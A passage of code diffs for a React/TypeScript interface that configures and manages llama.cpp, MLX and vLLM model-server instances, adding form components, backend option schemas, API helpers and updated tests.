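import React, { useState } from "react";
import EnvironmentVariablesInput from "@/components/form/EnvironmentVariablesInput";

const EnvVarsExample: React.FC = () => {
  // The component reports undefined when no complete key/value pairs remain
  const [env, setEnv] = useState<Record<string, string> | undefined>({
    CUDA_VISIBLE_DEVICES: "0",
  });

  return (
    <EnvironmentVariablesInput
      id="environment"
      label="Environment Variables"
      value={env}
      onChange={setEnv}
      description="Passed to the backend process on start"
    />
  );
};

export default EnvVarsExample;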

View File

@@ -0,0 +1,60 @@
import React from 'react'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
interface NumberInputProps {
id: string
label: string
value: number | undefined
onChange: (value: number | undefined) => void
placeholder?: string
description?: string
disabled?: boolean
className?: string
}
const NumberInput: React.FC<NumberInputProps> = ({
id,
label,
value,
onChange,
placeholder,
description,
disabled = false,
className
}) => {
const handleChange = (inputValue: string) => {
if (inputValue === '') {
onChange(undefined)
return
}
const numValue = parseFloat(inputValue)
if (!isNaN(numValue)) {
onChange(numValue)
}
}
return (
<div className="grid gap-2">
<Label htmlFor={id}>
{label}
</Label>
<Input
id={id}
type="number"
step="any"
value={value !== undefined ? value : ''}
onChange={(e) => handleChange(e.target.value)}
placeholder={placeholder}
disabled={disabled}
className={className}
/>
{description && (
<p className="text-sm text-muted-foreground">{description}</p>
)}
</div>
)
}
export default NumberInput

View File

@@ -0,0 +1,55 @@
import React from 'react'
import { Label } from '@/components/ui/label'
interface SelectOption {
value: string
label: string
}
interface SelectInputProps {
id: string
label: string
value: string | undefined
onChange: (value: string | undefined) => void
options: SelectOption[]
description?: string
disabled?: boolean
className?: string
}
const SelectInput: React.FC<SelectInputProps> = ({
id,
label,
value,
onChange,
options,
description,
disabled = false,
className
}) => {
return (
<div className="grid gap-2">
<Label htmlFor={id}>
{label}
</Label>
<select
id={id}
value={value || ''}
onChange={(e) => onChange(e.target.value || undefined)}
disabled={disabled}
className={`flex h-10 w-full rounded-md border border-input bg-background px-3 py-2 text-sm ring-offset-background focus-visible:outline-none focus-visible:ring-2 focus-visible:ring-ring focus-visible:ring-offset-2 disabled:cursor-not-allowed disabled:opacity-50 ${className || ''}`}
>
{options.map(option => (
<option key={option.value} value={option.value}>
{option.label}
</option>
))}
</select>
{description && (
<p className="text-sm text-muted-foreground">{description}</p>
)}
</div>
)
}
export default SelectInput
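A small controlled-usage sketch for SelectInput, using the same backend options list that SystemInfoDialog and BackendConfigurationCard pass in; the surrounding component is illustrative.

import React, { useState } from "react";
import SelectInput from "@/components/form/SelectInput";
import { BackendType, type BackendTypeValue } from "@/types/instance";

const BackendPicker: React.FC = () => {
  const [backend, setBackend] = useState<BackendTypeValue>(BackendType.LLAMA_CPP);

  return (
    <SelectInput
      id="backend_type"
      label="Backend Type"
      value={backend}
      // An empty selection falls back to llama.cpp
      onChange={(value) => setBackend((value || BackendType.LLAMA_CPP) as BackendTypeValue)}
      options={[
        { value: BackendType.LLAMA_CPP, label: "Llama Server" },
        { value: BackendType.MLX_LM, label: "MLX LM" },
        { value: BackendType.VLLM, label: "vLLM" },
      ]}
      description="Select the backend server type"
    />
  );
};

export default BackendPicker;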

View File

@@ -0,0 +1,47 @@
import React from 'react'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
interface TextInputProps {
id: string
label: string
value: string | number | undefined
onChange: (value: string | undefined) => void
placeholder?: string
description?: string
disabled?: boolean
className?: string
}
const TextInput: React.FC<TextInputProps> = ({
id,
label,
value,
onChange,
placeholder,
description,
disabled = false,
className
}) => {
return (
<div className="grid gap-2">
<Label htmlFor={id}>
{label}
</Label>
<Input
id={id}
type="text"
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
onChange={(e) => onChange(e.target.value || undefined)}
placeholder={placeholder}
disabled={disabled}
className={className}
/>
{description && (
<p className="text-sm text-muted-foreground">{description}</p>
)}
</div>
)
}
export default TextInput

View File

@@ -0,0 +1,53 @@
import React from 'react'
import type { CreateInstanceOptions } from '@/types/instance'
import CheckboxInput from '@/components/form/CheckboxInput'
import NumberInput from '@/components/form/NumberInput'
interface AutoRestartConfigurationProps {
formData: CreateInstanceOptions
onChange: (key: keyof CreateInstanceOptions, value: any) => void
}
const AutoRestartConfiguration: React.FC<AutoRestartConfigurationProps> = ({
formData,
onChange
}) => {
const isAutoRestartEnabled = formData.auto_restart === true
return (
<div className="space-y-4">
<h3 className="text-lg font-medium">Auto Restart Configuration</h3>
<CheckboxInput
id="auto_restart"
label="Auto Restart"
value={formData.auto_restart}
onChange={(value) => onChange('auto_restart', value)}
description="Automatically restart the instance on failure"
/>
{isAutoRestartEnabled && (
<div className="ml-6 space-y-4 border-l-2 border-muted pl-4">
<NumberInput
id="max_restarts"
label="Max Restarts"
value={formData.max_restarts}
onChange={(value) => onChange('max_restarts', value)}
placeholder="3"
description="Maximum number of restart attempts (0 = unlimited)"
/>
<NumberInput
id="restart_delay"
label="Restart Delay (seconds)"
value={formData.restart_delay}
onChange={(value) => onChange('restart_delay', value)}
placeholder="5"
description="Delay in seconds before attempting restart"
/>
</div>
)}
</div>
)
}
export default AutoRestartConfiguration
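A sketch of driving AutoRestartConfiguration from CreateInstanceOptions state, as InstanceSettingsCard does below; the host component here is an assumption for illustration.

import React, { useState } from "react";
import type { CreateInstanceOptions } from "@/types/instance";
import AutoRestartConfiguration from "@/components/instance/AutoRestartConfiguration";

const RestartSettingsExample: React.FC = () => {
  const [formData, setFormData] = useState<CreateInstanceOptions>({ auto_restart: true });

  return (
    <AutoRestartConfiguration
      formData={formData}
      // Generic key/value updater; max_restarts and restart_delay only render while auto_restart is true
      onChange={(key, value) => setFormData((prev) => ({ ...prev, [key]: value }))}
    />
  );
};

export default RestartSettingsExample;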

View File

@@ -0,0 +1,54 @@
import React from 'react'
import type { CreateInstanceOptions } from '@/types/instance'
import { getBasicBackendFields, getAdvancedBackendFields } from '@/lib/zodFormUtils'
import BackendFormField from '@/components/BackendFormField'
interface BackendConfigurationProps {
formData: CreateInstanceOptions
onBackendFieldChange: (key: string, value: any) => void
showAdvanced?: boolean
}
const BackendConfiguration: React.FC<BackendConfigurationProps> = ({
formData,
onBackendFieldChange,
showAdvanced = false
}) => {
const basicBackendFields = getBasicBackendFields(formData.backend_type)
const advancedBackendFields = getAdvancedBackendFields(formData.backend_type)
return (
<div className="space-y-4">
<h3 className="text-lg font-medium">Backend Configuration</h3>
{/* Basic backend fields */}
{basicBackendFields.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={(formData.backend_options as any)?.[fieldKey]}
onChange={onBackendFieldChange}
/>
))}
{/* Advanced backend fields */}
{showAdvanced && advancedBackendFields.length > 0 && (
<div className="space-y-4 pl-6 border-l-2 border-muted">
<h4 className="text-md font-medium">Advanced Backend Configuration</h4>
{advancedBackendFields
.sort()
.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={(formData.backend_options as any)?.[fieldKey]}
onChange={onBackendFieldChange}
/>
))}
</div>
)}
</div>
)
}
export default BackendConfiguration

View File

@@ -0,0 +1,117 @@
import React, { useState } from 'react'
import { BackendType, type CreateInstanceOptions } from '@/types/instance'
import { Card, CardContent, CardHeader, CardTitle } from '@/components/ui/card'
import { Button } from '@/components/ui/button'
import { Terminal, ChevronDown, ChevronRight } from 'lucide-react'
import { getBasicBackendFields, getAdvancedBackendFields } from '@/lib/zodFormUtils'
import BackendFormField from '@/components/BackendFormField'
import SelectInput from '@/components/form/SelectInput'
interface BackendConfigurationCardProps {
formData: CreateInstanceOptions
onBackendFieldChange: (key: string, value: unknown) => void
onChange: (key: keyof CreateInstanceOptions, value: unknown) => void
onParseCommand: () => void
}
const BackendConfigurationCard: React.FC<BackendConfigurationCardProps> = ({
formData,
onBackendFieldChange,
onChange,
onParseCommand
}) => {
const [showAdvanced, setShowAdvanced] = useState(false)
const basicBackendFields = getBasicBackendFields(formData.backend_type)
const advancedBackendFields = getAdvancedBackendFields(formData.backend_type)
return (
<Card>
<CardHeader>
<CardTitle>Backend Configuration</CardTitle>
</CardHeader>
<CardContent className="space-y-6">
{/* Backend Type Selection */}
<SelectInput
id="backend_type"
label="Backend Type"
value={formData.backend_type || BackendType.LLAMA_CPP}
onChange={(value) => onChange('backend_type', value)}
options={[
{ value: BackendType.LLAMA_CPP, label: 'Llama Server' },
{ value: BackendType.MLX_LM, label: 'MLX LM' },
{ value: BackendType.VLLM, label: 'vLLM' }
]}
description="Select the backend server type"
/>
{/* Parse Command Section */}
<div className="flex flex-col gap-2">
<Button
variant="outline"
onClick={onParseCommand}
className="flex items-center gap-2 w-fit"
>
<Terminal className="h-4 w-4" />
Parse Command
</Button>
<p className="text-sm text-muted-foreground">
Import settings from your backend command
</p>
</div>
{/* Basic Backend Options */}
{basicBackendFields.length > 0 && (
<div className="space-y-4">
<h3 className="text-md font-medium">Basic Backend Options</h3>
{basicBackendFields.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={(formData.backend_options as Record<string, unknown>)?.[fieldKey] as string | number | boolean | string[] | undefined}
onChange={onBackendFieldChange}
/>
))}
</div>
)}
{/* Advanced Backend Options */}
{advancedBackendFields.length > 0 && (
<div className="space-y-4">
<Button
variant="ghost"
onClick={() => setShowAdvanced(!showAdvanced)}
className="flex items-center gap-2 p-0 h-auto font-medium"
>
{showAdvanced ? (
<ChevronDown className="h-4 w-4" />
) : (
<ChevronRight className="h-4 w-4" />
)}
Advanced Backend Options
<span className="text-muted-foreground text-sm font-normal">
({advancedBackendFields.length} options)
</span>
</Button>
{showAdvanced && (
<div className="space-y-4 pl-6 border-l-2 border-muted">
{advancedBackendFields
.sort()
.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={(formData.backend_options as Record<string, unknown>)?.[fieldKey] as string | number | boolean | string[] | undefined}
onChange={onBackendFieldChange}
/>
))}
</div>
)}
</div>
)}
</CardContent>
</Card>
)
}
export default BackendConfigurationCard

View File

@@ -0,0 +1,93 @@
import React from 'react'
import type { CreateInstanceOptions } from '@/types/instance'
import { Card, CardContent, CardHeader, CardTitle } from '@/components/ui/card'
import { Label } from '@/components/ui/label'
import { Input } from '@/components/ui/input'
import AutoRestartConfiguration from '@/components/instance/AutoRestartConfiguration'
import NumberInput from '@/components/form/NumberInput'
import CheckboxInput from '@/components/form/CheckboxInput'
import EnvironmentVariablesInput from '@/components/form/EnvironmentVariablesInput'
interface InstanceSettingsCardProps {
instanceName: string
nameError: string
isEditing: boolean
formData: CreateInstanceOptions
onNameChange: (name: string) => void
onChange: (key: keyof CreateInstanceOptions, value: unknown) => void
}
const InstanceSettingsCard: React.FC<InstanceSettingsCardProps> = ({
instanceName,
nameError,
isEditing,
formData,
onNameChange,
onChange
}) => {
return (
<Card>
<CardHeader>
<CardTitle>Instance Settings</CardTitle>
</CardHeader>
<CardContent className="space-y-6">
{/* Instance Name */}
<div className="grid gap-2">
<Label htmlFor="name">
Instance Name <span className="text-red-500">*</span>
</Label>
<Input
id="name"
value={instanceName}
onChange={(e) => onNameChange(e.target.value)}
placeholder="my-instance"
disabled={isEditing}
className={nameError ? "border-red-500" : ""}
/>
{nameError && <p className="text-sm text-red-500">{nameError}</p>}
<p className="text-sm text-muted-foreground">
Unique identifier for the instance
</p>
</div>
{/* Auto Restart Configuration */}
<AutoRestartConfiguration
formData={formData}
onChange={onChange}
/>
{/* Basic Instance Options */}
<div className="space-y-4">
<h3 className="text-lg font-medium">Basic Instance Options</h3>
<NumberInput
id="idle_timeout"
label="Idle Timeout (minutes)"
value={formData.idle_timeout}
onChange={(value) => onChange('idle_timeout', value)}
placeholder="30"
description="Minutes before stopping an idle instance"
/>
<CheckboxInput
id="on_demand_start"
label="On Demand Start"
value={formData.on_demand_start}
onChange={(value) => onChange('on_demand_start', value)}
description="Start instance only when needed"
/>
<EnvironmentVariablesInput
id="environment"
label="Environment Variables"
value={formData.environment}
onChange={(value) => onChange('environment', value)}
description="Custom environment variables for the instance"
/>
</div>
</CardContent>
</Card>
)
}
export default InstanceSettingsCard

View File

@@ -112,9 +112,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
try {
setError(null)
await instancesApi.start(name)
// Update only this instance's status
updateInstanceInMap(name, { status: "running" })
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to start instance')
}
@@ -124,9 +124,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
try {
setError(null)
await instancesApi.stop(name)
// Update only this instance's status
updateInstanceInMap(name, { status: "stopped" })
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to stop instance')
}
@@ -136,9 +136,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
try {
setError(null)
await instancesApi.restart(name)
// Update only this instance's status
updateInstanceInMap(name, { status: "running" })
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to restart instance')
}

View File

@@ -4,6 +4,7 @@ import type { ReactNode } from "react";
import { InstancesProvider, useInstances } from "@/contexts/InstancesContext";
import { instancesApi } from "@/lib/api";
import type { Instance } from "@/types/instance";
import { BackendType } from "@/types/instance";
import { AuthProvider } from "../AuthContext";
// Mock the API module
@@ -41,19 +42,19 @@ function TestComponent() {
<div data-testid="instances-count">{instances.length}</div>
{instances.map((instance) => (
<div key={instance.name} data-testid={`instance-${instance.name}`}>
{instance.name}:{instance.status}
</div>
))}
{/* Action buttons for testing with specific instances */}
<button
onClick={() => createInstance("new-instance", { model: "test.gguf" })}
onClick={() => createInstance("new-instance", { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "test.gguf" } })}
data-testid="create-instance"
>
Create Instance
</button>
<button
onClick={() => updateInstance("instance1", { model: "updated.gguf" })}
onClick={() => updateInstance("instance1", { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "updated.gguf" } })}
data-testid="update-instance"
>
Update Instance
@@ -99,8 +100,8 @@ function renderWithProvider(children: ReactNode) {
describe("InstancesContext", () => {
const mockInstances: Instance[] = [
{ name: "instance1", running: true, options: { model: "model1.gguf" } },
{ name: "instance2", running: false, options: { model: "model2.gguf" } },
{ name: "instance1", status: "running", options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "model1.gguf" } } },
{ name: "instance2", status: "stopped", options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "model2.gguf" } } },
];
beforeEach(() => {
@@ -132,10 +133,10 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("loading")).toHaveTextContent("false");
expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
"instance1:true"
"instance1:running"
);
expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:false"
"instance2:stopped"
);
});
});
@@ -158,8 +159,8 @@ describe("InstancesContext", () => {
it("creates instance and adds it to state", async () => {
const newInstance: Instance = {
name: "new-instance",
status: "stopped",
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "test.gguf" } },
};
vi.mocked(instancesApi.create).mockResolvedValue(newInstance);
@@ -174,14 +175,15 @@ describe("InstancesContext", () => {
await waitFor(() => {
expect(instancesApi.create).toHaveBeenCalledWith("new-instance", {
model: "test.gguf",
backend_type: BackendType.LLAMA_CPP,
backend_options: { model: "test.gguf" }
});
});
await waitFor(() => {
expect(screen.getByTestId("instances-count")).toHaveTextContent("3");
expect(screen.getByTestId("instance-new-instance")).toHaveTextContent(
"new-instance:false"
"new-instance:stopped"
);
});
});
@@ -214,8 +216,8 @@ describe("InstancesContext", () => {
it("updates instance and maintains it in state", async () => {
const updatedInstance: Instance = {
name: "instance1",
status: "running",
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "updated.gguf" } },
};
vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance);
@@ -230,7 +232,8 @@ describe("InstancesContext", () => {
await waitFor(() => {
expect(instancesApi.update).toHaveBeenCalledWith("instance1", {
model: "updated.gguf",
backend_type: BackendType.LLAMA_CPP,
backend_options: { model: "updated.gguf" }
});
});
@@ -251,7 +254,7 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("loading")).toHaveTextContent("false");
// instance2 starts as not running
expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:false"
"instance2:stopped"
);
});
@@ -262,7 +265,7 @@ describe("InstancesContext", () => {
expect(instancesApi.start).toHaveBeenCalledWith("instance2");
// The running state should be updated to true
expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:true"
"instance2:running"
);
});
});
@@ -276,7 +279,7 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("loading")).toHaveTextContent("false");
// instance1 starts as running
expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
"instance1:true"
"instance1:running"
);
});
@@ -287,7 +290,7 @@ describe("InstancesContext", () => {
expect(instancesApi.stop).toHaveBeenCalledWith("instance1");
// The running state should be updated to false
expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
"instance1:false"
"instance1:stopped"
);
});
});
@@ -383,7 +386,7 @@ describe("InstancesContext", () => {
// Test that operations don't interfere with each other
const newInstance: Instance = {
name: "new-instance",
status: "stopped",
options: {},
};
vi.mocked(instancesApi.create).mockResolvedValue(newInstance);
@@ -411,7 +414,7 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("instances-count")).toHaveTextContent("3"); // Still 3
// But the running state should change
expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:true"
"instance2:running"
);
});
});

View File

@@ -1,14 +1,19 @@
// ui/src/hooks/useInstanceHealth.ts
import { useState, useEffect } from 'react'
import type { HealthStatus, InstanceStatus } from '@/types/instance'
import { healthService } from '@/lib/healthService'
export function useInstanceHealth(instanceName: string, instanceStatus: InstanceStatus): HealthStatus | undefined {
const [health, setHealth] = useState<HealthStatus | undefined>()
useEffect(() => {
if (instanceStatus === "stopped") {
setHealth({ status: "unknown", lastChecked: new Date() })
return
}
if (instanceStatus === "failed") {
setHealth({ status: instanceStatus, lastChecked: new Date() })
return
}
@@ -17,9 +22,9 @@ export function useInstanceHealth(instanceName: string, isRunning: boolean): Hea
setHealth(healthStatus)
})
// Cleanup subscription on unmount or when instanceStatus changes
return unsubscribe
}, [instanceName, instanceStatus])
return health
}

View File

@@ -1,4 +1,5 @@
import type { CreateInstanceOptions, Instance } from "@/types/instance";
import { handleApiError } from "./errorUtils";
const API_BASE = "/api/v1";
@@ -30,25 +31,8 @@ async function apiCall<T>(
headers,
});
// Handle errors using centralized error handler
await handleApiError(response);
// Handle empty responses (like DELETE)
if (response.status === 204) {
@@ -60,6 +44,14 @@ async function apiCall<T>(
const text = await response.text();
return text as T;
} else {
// Handle empty responses for JSON endpoints
const contentLength = response.headers.get('content-length');
if (contentLength === '0' || contentLength === null) {
const text = await response.text();
if (text.trim() === '') {
return {} as T; // Return empty object for empty JSON responses
}
}
const data = await response.json() as T;
return data;
}
@@ -71,16 +63,44 @@ async function apiCall<T>(
}
}
// Server API functions (moved to llama-cpp backend)
export const serverApi = {
// GET /backends/llama-cpp/help
getHelp: () => apiCall<string>("/backends/llama-cpp/help", {}, "text"),
// GET /backends/llama-cpp/version
getVersion: () => apiCall<string>("/backends/llama-cpp/version", {}, "text"),
// GET /backends/llama-cpp/devices
getDevices: () => apiCall<string>("/backends/llama-cpp/devices", {}, "text"),
};
// Backend API functions
export const backendsApi = {
llamaCpp: {
// POST /backends/llama-cpp/parse-command
parseCommand: (command: string) =>
apiCall<CreateInstanceOptions>('/backends/llama-cpp/parse-command', {
method: 'POST',
body: JSON.stringify({ command }),
}),
},
mlx: {
// POST /backends/mlx/parse-command
parseCommand: (command: string) =>
apiCall<CreateInstanceOptions>('/backends/mlx/parse-command', {
method: 'POST',
body: JSON.stringify({ command }),
}),
},
vllm: {
// POST /backends/vllm/parse-command
parseCommand: (command: string) =>
apiCall<CreateInstanceOptions>('/backends/vllm/parse-command', {
method: 'POST',
body: JSON.stringify({ command }),
}),
},
};
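A usage sketch for the new parse-command endpoints; the helper function below is illustrative and relies on apiCall throwing on non-2xx responses as shown above.

import { backendsApi } from "@/lib/api";
import type { CreateInstanceOptions } from "@/types/instance";

// Parse a raw llama-server command line into CreateInstanceOptions.
// apiCall throws on errors, so callers should catch and handle failures.
async function parseLlamaCommand(command: string): Promise<CreateInstanceOptions | null> {
  try {
    return await backendsApi.llamaCpp.parseCommand(command);
  } catch (err) {
    console.error("Failed to parse command", err);
    return null;
  }
}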
// Instance API functions
@@ -136,5 +156,5 @@ export const instancesApi = {
},
// GET /instances/{name}/proxy/health
getHealth: (name: string) => apiCall<Record<string, unknown>>(`/instances/${name}/proxy/health`),
};

View File

@@ -0,0 +1,32 @@
/**
* Parses error response from API calls and returns a formatted error message
*/
export async function parseErrorResponse(response: Response): Promise<string> {
let errorMessage = `HTTP ${response.status}`
try {
const errorText = await response.text()
if (errorText) {
errorMessage += `: ${errorText}`
}
} catch {
// If we can't read the error, just use status
}
return errorMessage
}
/**
* Handles common API call errors and throws appropriate Error objects
*/
export async function handleApiError(response: Response): Promise<void> {
// Handle authentication errors
if (response.status === 401) {
throw new Error('Authentication required')
}
if (!response.ok) {
const errorMessage = await parseErrorResponse(response)
throw new Error(errorMessage)
}
}
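A sketch of using the extracted helper directly around fetch, outside of apiCall; the endpoint wrapper is illustrative, and the import path assumes the file sits next to api.ts at '@/lib/errorUtils' (api.ts imports it as "./errorUtils").

import { handleApiError } from "@/lib/errorUtils"; // assumed alias for ./errorUtils

// Fetch an arbitrary JSON endpoint and surface server errors as thrown Errors,
// matching the behaviour apiCall gets from handleApiError.
async function fetchJson<T>(url: string): Promise<T> {
  const response = await fetch(url);
  await handleApiError(response); // throws on 401 or any non-ok status
  return (await response.json()) as T;
}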

View File

@@ -1,35 +1,24 @@
import {
type LlamaCppBackendOptions,
type MlxBackendOptions,
type VllmBackendOptions,
LlamaCppBackendOptionsSchema,
MlxBackendOptionsSchema,
VllmBackendOptionsSchema,
getAllLlamaCppFieldKeys,
getAllMlxFieldKeys,
getAllVllmFieldKeys,
getLlamaCppFieldType,
getMlxFieldType,
getVllmFieldType
} from '@/schemas/instanceOptions'
// LlamaCpp backend-specific basic fields
const basicLlamaCppFieldsConfig: Record<string, {
label: string
description?: string
placeholder?: string
required?: boolean
}> = {
auto_restart: {
label: 'Auto Restart',
description: 'Automatically restart the instance on failure'
},
max_restarts: {
label: 'Max Restarts',
placeholder: '3',
description: 'Maximum number of restart attempts (0 = unlimited)'
},
restart_delay: {
label: 'Restart Delay (seconds)',
placeholder: '5',
description: 'Delay in seconds before attempting restart'
},
idle_timeout: {
label: 'Idle Timeout (minutes)',
placeholder: '60',
description: 'Time in minutes before instance is considered idle and stopped'
},
on_demand_start: {
label: 'On-Demand Start',
description: 'Start instance upon receiving OpenAI-compatible API request'
},
model: {
label: 'Model Path',
placeholder: '/path/to/model.gguf',
@@ -52,17 +41,135 @@ export const basicFieldsConfig: Record<string, {
}
}
export function isBasicField(key: keyof CreateInstanceOptions): boolean {
return key in basicFieldsConfig
// MLX backend-specific basic fields
const basicMlxFieldsConfig: Record<string, {
label: string
description?: string
placeholder?: string
}> = {
model: {
label: 'Model',
placeholder: 'mlx-community/Mistral-7B-Instruct-v0.3-4bit',
description: 'The path to the MLX model weights, tokenizer, and config'
},
temp: {
label: 'Temperature',
placeholder: '0.0',
description: 'Default sampling temperature (default: 0.0)'
},
top_p: {
label: 'Top-P',
placeholder: '1.0',
description: 'Default nucleus sampling top-p (default: 1.0)'
},
top_k: {
label: 'Top-K',
placeholder: '0',
description: 'Default top-k sampling (default: 0, disables top-k)'
},
min_p: {
label: 'Min-P',
placeholder: '0.0',
description: 'Default min-p sampling (default: 0.0, disables min-p)'
},
max_tokens: {
label: 'Max Tokens',
placeholder: '512',
description: 'Default maximum number of tokens to generate (default: 512)'
}
}
export function getBasicFields(): (keyof CreateInstanceOptions)[] {
return Object.keys(basicFieldsConfig) as (keyof CreateInstanceOptions)[]
// vLLM backend-specific basic fields
const basicVllmFieldsConfig: Record<string, {
label: string
description?: string
placeholder?: string
}> = {
model: {
label: 'Model',
placeholder: 'microsoft/DialoGPT-medium',
description: 'The name or path of the Hugging Face model to use'
},
tensor_parallel_size: {
label: 'Tensor Parallel Size',
placeholder: '1',
description: 'Number of GPUs to use for distributed serving'
},
gpu_memory_utilization: {
label: 'GPU Memory Utilization',
placeholder: '0.9',
description: 'The fraction of GPU memory to be used for the model executor'
}
}
export function getAdvancedFields(): (keyof CreateInstanceOptions)[] {
return getAllFieldKeys().filter(key => !isBasicField(key))
// Backend field configuration lookup
const backendFieldConfigs = {
mlx_lm: basicMlxFieldsConfig,
vllm: basicVllmFieldsConfig,
llama_cpp: basicLlamaCppFieldsConfig,
} as const
const backendFieldGetters = {
mlx_lm: getAllMlxFieldKeys,
vllm: getAllVllmFieldKeys,
llama_cpp: getAllLlamaCppFieldKeys,
} as const
export function getBasicBackendFields(backendType?: string): string[] {
const normalizedType = (backendType || 'llama_cpp') as keyof typeof backendFieldConfigs
const config = backendFieldConfigs[normalizedType] || basicLlamaCppFieldsConfig
return Object.keys(config)
}
export function getAdvancedBackendFields(backendType?: string): string[] {
const normalizedType = (backendType || 'llama_cpp') as keyof typeof backendFieldGetters
const fieldGetter = backendFieldGetters[normalizedType] || getAllLlamaCppFieldKeys
const basicConfig = backendFieldConfigs[normalizedType] || basicLlamaCppFieldsConfig
return fieldGetter().filter(key => !(key in basicConfig))
}
// Combined backend fields config for use in BackendFormField
export const basicBackendFieldsConfig: Record<string, {
label: string
description?: string
placeholder?: string
}> = {
...basicLlamaCppFieldsConfig,
...basicMlxFieldsConfig,
...basicVllmFieldsConfig
}
// Get field type for any backend option (union type)
export function getBackendFieldType(key: string): 'text' | 'number' | 'boolean' | 'array' {
// Try to get type from LlamaCpp schema first
try {
if (LlamaCppBackendOptionsSchema.shape && key in LlamaCppBackendOptionsSchema.shape) {
return getLlamaCppFieldType(key as keyof LlamaCppBackendOptions)
}
} catch {
// Schema might not be available
}
// Try MLX schema
try {
if (MlxBackendOptionsSchema.shape && key in MlxBackendOptionsSchema.shape) {
return getMlxFieldType(key as keyof MlxBackendOptions)
}
} catch {
// Schema might not be available
}
// Try vLLM schema
try {
if (VllmBackendOptionsSchema.shape && key in VllmBackendOptionsSchema.shape) {
return getVllmFieldType(key as keyof VllmBackendOptions)
}
} catch {
// Schema might not be available
}
// Default fallback
return 'text'
}
// Re-export the Zod-based functions
export { getFieldType } from '@/schemas/instanceOptions'
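
A sketch of how a form component might combine these helpers; the function itself and the import path are hypothetical, while the helpers are defined above.

import {
  getBasicBackendFields,
  getBackendFieldType,
  basicBackendFieldsConfig,
} from '@/lib/backendFields' // module path assumed

// Produce "Label (type)" strings for the basic fields of a given backend.
function describeBasicFields(backendType?: string): string[] {
  return getBasicBackendFields(backendType).map((key) => {
    const meta = basicBackendFieldsConfig[key]
    return `${meta?.label ?? key} (${getBackendFieldType(key)})`
  })
}

// describeBasicFields('vllm') -> ['Model (text)', 'Tensor Parallel Size (number)', 'GPU Memory Utilization (number)']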


@@ -0,0 +1,4 @@
// Re-export all backend schemas from one place
export * from './llamacpp'
export * from './mlx'
export * from './vllm'
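
With the barrel file in place, consumers can pull any backend schema from a single path (path assumed):

import {
  LlamaCppBackendOptionsSchema,
  MlxBackendOptionsSchema,
  VllmBackendOptionsSchema,
} from '@/schemas/backends'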


@@ -0,0 +1,192 @@
import { z } from 'zod'
// Define the LlamaCpp backend options schema
export const LlamaCppBackendOptionsSchema = z.object({
// Common params
verbose_prompt: z.boolean().optional(),
threads: z.number().optional(),
threads_batch: z.number().optional(),
cpu_mask: z.string().optional(),
cpu_range: z.string().optional(),
cpu_strict: z.number().optional(),
prio: z.number().optional(),
poll: z.number().optional(),
cpu_mask_batch: z.string().optional(),
cpu_range_batch: z.string().optional(),
cpu_strict_batch: z.number().optional(),
prio_batch: z.number().optional(),
poll_batch: z.number().optional(),
ctx_size: z.number().optional(),
predict: z.number().optional(),
batch_size: z.number().optional(),
ubatch_size: z.number().optional(),
keep: z.number().optional(),
flash_attn: z.boolean().optional(),
no_perf: z.boolean().optional(),
escape: z.boolean().optional(),
no_escape: z.boolean().optional(),
rope_scaling: z.string().optional(),
rope_scale: z.number().optional(),
rope_freq_base: z.number().optional(),
rope_freq_scale: z.number().optional(),
yarn_orig_ctx: z.number().optional(),
yarn_ext_factor: z.number().optional(),
yarn_attn_factor: z.number().optional(),
yarn_beta_slow: z.number().optional(),
yarn_beta_fast: z.number().optional(),
dump_kv_cache: z.boolean().optional(),
no_kv_offload: z.boolean().optional(),
cache_type_k: z.string().optional(),
cache_type_v: z.string().optional(),
defrag_thold: z.number().optional(),
parallel: z.number().optional(),
mlock: z.boolean().optional(),
no_mmap: z.boolean().optional(),
numa: z.string().optional(),
device: z.string().optional(),
override_tensor: z.array(z.string()).optional(),
gpu_layers: z.number().optional(),
split_mode: z.string().optional(),
tensor_split: z.string().optional(),
main_gpu: z.number().optional(),
check_tensors: z.boolean().optional(),
override_kv: z.array(z.string()).optional(),
lora: z.array(z.string()).optional(),
lora_scaled: z.array(z.string()).optional(),
control_vector: z.array(z.string()).optional(),
control_vector_scaled: z.array(z.string()).optional(),
control_vector_layer_range: z.string().optional(),
model: z.string().optional(),
model_url: z.string().optional(),
hf_repo: z.string().optional(),
hf_repo_draft: z.string().optional(),
hf_file: z.string().optional(),
hf_repo_v: z.string().optional(),
hf_file_v: z.string().optional(),
hf_token: z.string().optional(),
log_disable: z.boolean().optional(),
log_file: z.string().optional(),
log_colors: z.boolean().optional(),
verbose: z.boolean().optional(),
verbosity: z.number().optional(),
log_prefix: z.boolean().optional(),
log_timestamps: z.boolean().optional(),
// Sampling params
samplers: z.string().optional(),
seed: z.number().optional(),
sampling_seq: z.string().optional(),
